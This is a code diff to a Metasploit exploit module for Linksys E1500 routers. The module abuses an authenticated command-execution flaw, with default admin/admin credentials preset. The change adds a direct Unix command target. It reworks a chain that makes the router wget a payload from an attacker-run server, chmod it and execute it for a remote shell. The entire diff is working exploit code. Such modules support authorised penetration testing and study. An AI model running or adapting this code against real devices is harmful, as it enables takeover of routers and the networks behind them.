diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb index 9a701d3fb8..fd932ebd5a 100644 --- a/modules/exploits/linux/http/linksys_e1500_up_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb @@ -30,15 +30,26 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 05 2013', 'Privileged' => true, - 'Platform' => [ 'linux' ], - 'Arch' => ARCH_MIPSLE, - 'Targets' => [[ 'Automatic', { }]], - 'Payload' => - { - 'Space' => 1024, - 'DisableNops' => true, - }, - 'DefaultTarget' => 0 + #'Platform' => 'linux', + #'Arch' => ARCH_MIPSLE, + 'Targets' => + [ + [ 'Unix CMD', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + #only payload cmd/unix/generic should be possible + } + ], + [ 'Linux Payload', + { + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux', + 'DisableNops' => true, + } + ], + ], + 'DefaultTarget' => 1, )) register_options( @@ -47,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]), - OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]), + OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]), ], self.class) end - #MISSING - command execution payload def request(cmd,user,pass,uri) begin @@ -91,30 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote rhost = datastore['RHOST'] rport = datastore['RPORT'] - # We must regenerate the payload-> not sure if this is the right way - arch = "ARCH_MIPSLE" - plat = "linux" - p = exploit_regenerate_payload(plat, arch) - @pl = p.encoded_exe - - # - # start our server - # - resource_uri = '/' + downfile - service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri - print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") - start_service({'Uri' => { - 'Proc' => Proc.new { |cli, req| - on_request_uri(cli, req) - }, - 'Path' => resource_uri - }}) - - if (datastore['DOWNHOST']) - service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri - end - - # # testing Login # @@ -143,36 +129,75 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") + if target.name =~ /CMD/ + cmd = payload.encoded + request(cmd,user,pass,uri) + else + #lets get some shells ... - #this filename is used to store the payload on the device - filename = rand_text_alpha_lower(8) + # We must regenerate the payload-> not sure if this is the right way + arch = "ARCH_MIPSLE" + plat = "linux" + p = exploit_regenerate_payload(plat, arch) - cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" + @pl = p.encoded_exe - request(cmd,user,pass,uri) + # + # start our server + # + resource_uri = '/' + downfile - # - # chmod - # + if (datastore['DOWNHOST']) + service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri + else + #easy way ... do not use SSL ;) + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end - cmd = "chmod 777 /tmp/#{filename}" + service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri + print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) - print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}") + datastore['SSL'] = true if ssl_restore + end - request(cmd,user,pass,uri) + print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") + + #this filename is used to store the payload on the device + filename = rand_text_alpha_lower(8) + + cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" + + request(cmd,user,pass,uri) + + # + # chmod + # + + cmd = "chmod 777 /tmp/#{filename}" + + print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}") + + request(cmd,user,pass,uri) + + # + # execute + # + + cmd = "/tmp/#{filename}" + + print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") + + request(cmd,user,pass,uri) + end - # - # execute - # - - cmd = "/tmp/#{filename}" - - print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") - - request(cmd,user,pass,uri) - - handler end